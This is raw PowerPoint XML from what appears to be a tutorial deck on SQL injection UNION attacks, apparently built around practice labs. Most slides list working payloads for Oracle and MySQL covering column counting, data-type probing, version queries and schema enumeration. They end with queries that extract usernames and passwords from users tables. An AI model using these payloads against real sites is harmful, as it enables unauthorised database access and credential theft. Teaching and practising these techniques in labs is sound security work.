              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>in its HTTP response, or it might return a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>generic error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, or simply return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>second method </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>involves submitting a series of UNION SELECT payloads specifying a different number of null values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>' UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>NULL—</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>' UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>NULL,NULL—</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>' UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>NULL,NULL,NULL– </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>' UNION SELECT NULL FROM DUAL-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>-     (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>oracale</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t> database)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" u="sng" dirty="0"/>
              <a:t>Finding columns with a useful </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" u="sng" dirty="0"/>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>type(string/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" u="sng" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>/or other types) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" u="sng" dirty="0"/>
              <a:t>in an SQL injection UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" u="sng" dirty="0" smtClean="0"/>
              <a:t>attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>' UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>NULL,NULL,NULL,'a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>'—</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>' UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>NULL,'a',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>NULL,NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>—</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>' UNION SELECT username, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>password(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>coloumns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>users– (table)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33411227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GB" b="1" u="sng" dirty="0"/>
              <a:t>Querying the database type and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>version:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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1291" y="694087"/>
            <a:ext cx="8511413" cy="3113638"/>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24133641"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="341194" y="3889612"/>
          <a:ext cx="11464117" cy="2968387"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5554425"/>
                <a:gridCol w="5909692"/>
              </a:tblGrid>
              <a:tr h="2968387">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" u="sng" dirty="0" smtClean="0"/>
                        <a:t>Syntax for oracle</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-GB" u="sng" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" b="0" u="none" dirty="0" smtClean="0"/>
                        <a:t>' order by 3—</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" b="0" u="none" dirty="0" smtClean="0"/>
                        <a:t> ' UNION SELECT NULL,NULL FROM DUAL– </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" b="0" u="none" dirty="0" smtClean="0"/>
                        <a:t> ' UNION SELECT ‘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" b="0" u="none" dirty="0" err="1" smtClean="0"/>
                        <a:t>a’,’b</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" b="0" u="none" dirty="0" smtClean="0"/>
                        <a:t>’ FROM DUAL--  (checking string)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" b="0" u="none" dirty="0" smtClean="0"/>
                        <a:t> ' UNION SELECT </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" b="0" u="none" dirty="0" err="1" smtClean="0"/>
                        <a:t>banner,NULL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" b="0" u="none" dirty="0" smtClean="0"/>
                        <a:t> FROM </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" b="0" u="none" dirty="0" err="1" smtClean="0"/>
                        <a:t>v$version</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" b="0" u="none" dirty="0" smtClean="0"/>
                        <a:t>--  (version check) </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" b="0" u="none" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" u="sng" dirty="0" smtClean="0"/>
                        <a:t>Syntax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" u="sng" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> for </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" u="sng" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>mySql</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" u="sng" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-GB" u="sng" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" u="sng" dirty="0" smtClean="0"/>
                        <a:t>'</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" u="sng" dirty="0" smtClean="0"/>
                        <a:t>#--</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" u="sng" dirty="0" smtClean="0"/>
                        <a:t>'order by 1#</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" u="sng" dirty="0" smtClean="0"/>
                        <a:t>'order by 2-- -</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" u="sng" dirty="0" smtClean="0"/>
                        <a:t>' union select '</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" u="sng" dirty="0" err="1" smtClean="0"/>
                        <a:t>a',null</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" u="sng" dirty="0" smtClean="0"/>
                        <a:t>-- -</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" u="sng" dirty="0" smtClean="0"/>
                        <a:t>' union select '</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" u="sng" dirty="0" err="1" smtClean="0"/>
                        <a:t>a','b</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" u="sng" dirty="0" smtClean="0"/>
                        <a:t>'-- -</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" u="sng" dirty="0" smtClean="0"/>
                        <a:t>' UNION SELECT @@</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" u="sng" dirty="0" err="1" smtClean="0"/>
                        <a:t>version,NULL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" u="sng" dirty="0" smtClean="0"/>
                        <a:t>-- - </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" u="sng" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14737623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GB" b="1" u="sng" dirty="0"/>
              <a:t>Listing the contents of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>database:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Most database types (with the notable exception of Oracle) have a set of views called the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>information schema </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>which provide information about the database.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>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a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>You can then query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>nformation_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> to list the columns in individual tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>'Users‘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2005" y="1799926"/>
            <a:ext cx="6220693" cy="2248214"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2296297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514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Use the following payload to retrieve the list of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t> database:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>' UNION select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>schema_name,NUll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t> from INFORMATION_SCHEMA.SCHEMATA-- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>2.Use the following payload to retrieve the list of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t> tables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" u="sng" dirty="0" smtClean="0"/>
              <a:t>database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	'UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>table_name,NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>databaseName</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>3.Use the following payload (replacing the table name) to retrieve the details of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> in the table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>'UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t> ,NULL FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>users_uvlvoo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>'—</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>4. To find information of username and password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>‘ UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>username_jovsyx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>password_abwqcw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>users_uvlvoo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>– </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>concate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>: ' UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>NULL,username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> || '----&gt;' || password FROM users--</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5864226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GB" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Equivalent to information schema on Oracle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>You can list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t> tables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>by querying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>all_tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> : SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>all_tables</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>And you can list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t> columns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>by querying  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>all_tab_columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>  :  SELECT * FROM  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>all_tab_columns</a:t>
            </a:r>
            <a:r>
